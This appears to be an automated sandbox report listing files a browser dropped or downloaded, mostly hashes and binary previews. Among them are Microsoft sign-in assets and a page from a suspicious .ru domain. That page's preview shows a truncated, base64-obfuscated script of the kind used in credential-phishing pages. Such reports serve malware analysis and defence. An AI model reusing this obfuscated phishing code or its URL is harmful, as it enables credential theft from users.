                                                                  Reputation:low
                                                                  Preview:L..................F.@.. ...$+.,.......M.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$?}^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (47520)
                                                                  Category:dropped
                                                                  Size (bytes):47521
                                                                  Entropy (8bit):5.3981340461317835
                                                                  Encrypted:false
                                                                  SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                  MD5:7C92EC9D1395055CE0405A32607C7291
                                                                  SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                  SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                  SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:1
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                  Category:downloaded
                                                                  Size (bytes):5525
                                                                  Entropy (8bit):7.961202222662501
                                                                  Encrypted:false
                                                                  SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                  MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                  SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                  SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                  SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                  Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):96
                                                                  Entropy (8bit):5.218997042938778
                                                                  Encrypted:false
                                                                  SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                  MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                  SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                  SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                  SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                  Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (7497), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):20122
                                                                  Entropy (8bit):5.89275219607003
                                                                  Encrypted:false
                                                                  SSDEEP:384:snut7sNIADV/QtmTRP7Xnut7sNIADV/QtmTRP0lrSlrq:lGDItsRP7qGDItsRP0lrSlrq
                                                                  MD5:E5292B5B8C7E31A19E7B4DA8714B2F63
                                                                  SHA1:DBBB9E2566633C964670FFEC48BCC43E16273015
                                                                  SHA-256:55B33ECDEABC097C820CAB13AA14BBE29F4CAE5217936D949A2FE86DAD3E87C7
                                                                  SHA-512:8AA9A1EFEF599E377EC8C9E9A3FD47853ED6AE23BE3A7217EBBEBFE34E41C4EFCB2728E25D2F8DB738008CE12A6DCF39BB7034E1FCEE45B1321331650D653A2B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://m7sn.shaceshrov.ru/IgEEv/
                                                                  Preview: Success is not final, failure is not fatal: It is the courage to continue that counts. -->.. The only way to do great work is to love what you do. -->..<script>../* Successful people do what unsuccessful people are not willing to do. Don&#039;t wish it were easier; wish you were better. */..if(atob("aHR0cHM6Ly9NN1NuLnNoYWNlc2hyb3YucnUvSWdFRXYv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ci
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                  Category:dropped
                                                                  Size (bytes):621
                                                                  Entropy (8bit):7.673946009263606
                                                                  Encrypted:false
                                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                  Category:dropped
                                                                  Size (bytes):3620
                                                                  Entropy (8bit):6.867828878374734
                                                                  Encrypted:false
                                                                  SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                  MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                  SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                  SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                  SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                  Category:dropped
                                                                  Size (bytes):35170
                                                                  Entropy (8bit):7.993096534744333
                                                                  Encrypted:true
                                                                  SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                  MD5:171A4DD9400708B88724B57D62B24A6A
                                                                  SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                  SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                  SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                  Category:downloaded
                                                                  Size (bytes):17174
                                                                  Entropy (8bit):2.9129715116732746
                                                                  Encrypted:false
                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 89 x 8, 8-bit/color RGB, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):61
                                                                  Entropy (8bit):4.035372245524405
                                                                  Encrypted:false
                                                                  SSDEEP:3:yionv//thPlUnDP/7syxl/k4E08up:6v/lhPiDP/oy7Tp
                                                                  MD5:9AB7B18A5FE78385655923AD04C1527D
                                                                  SHA1:B31C7419DB9F512E0D338BC8442200E832B223EA
                                                                  SHA-256:9F5714F5CC9CAED3D2E0B3721997E2588D2C1964521A65FCB65F15FFCF280872
                                                                  SHA-512:51310DC3AE2F545E84375D3A6892D44EB46CAD05B2F9E0C446C88B8C466429CCFC8924B5E08229DA79F098EAB94917BE7550D6C31342E04D21F190507BB0CD58
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/901886f16aa00f3b/1736804243853/PTgPS3OFq7peaq1
                                                                  Preview:.PNG........IHDR...Y................IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                  Category:dropped
                                                                  Size (bytes):16345
                                                                  Entropy (8bit):7.98960525258912
                                                                  Encrypted:false
                                                                  SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                  MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                  SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                  SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                  SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                  Category:downloaded
                                                                  Size (bytes):673
                                                                  Entropy (8bit):7.6596900876595075
                                                                  Encrypted:false
                                                                  SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                  Category:dropped
                                                                  Size (bytes):2672
                                                                  Entropy (8bit):6.640973516071413
                                                                  Encrypted:false
                                                                  SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                  MD5:166DE53471265253AB3A456DEFE6DA23
                                                                  SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                  SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                  SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):61
                                                                  Entropy (8bit):3.990210155325004
                                                                  Encrypted:false
                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://nvchw.com/favicon.ico
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                  Category:dropped
                                                                  Size (bytes):49954
                                                                  Entropy (8bit):7.99493321471063
                                                                  Encrypted:true
                                                                  SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                  MD5:E16AC075AC754DBD1CF969508220E30D
                                                                  SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                  SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                  SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                  Category:downloaded
                                                                  Size (bytes):20410
                                                                  Entropy (8bit):7.980582012022051
                                                                  Encrypted:false
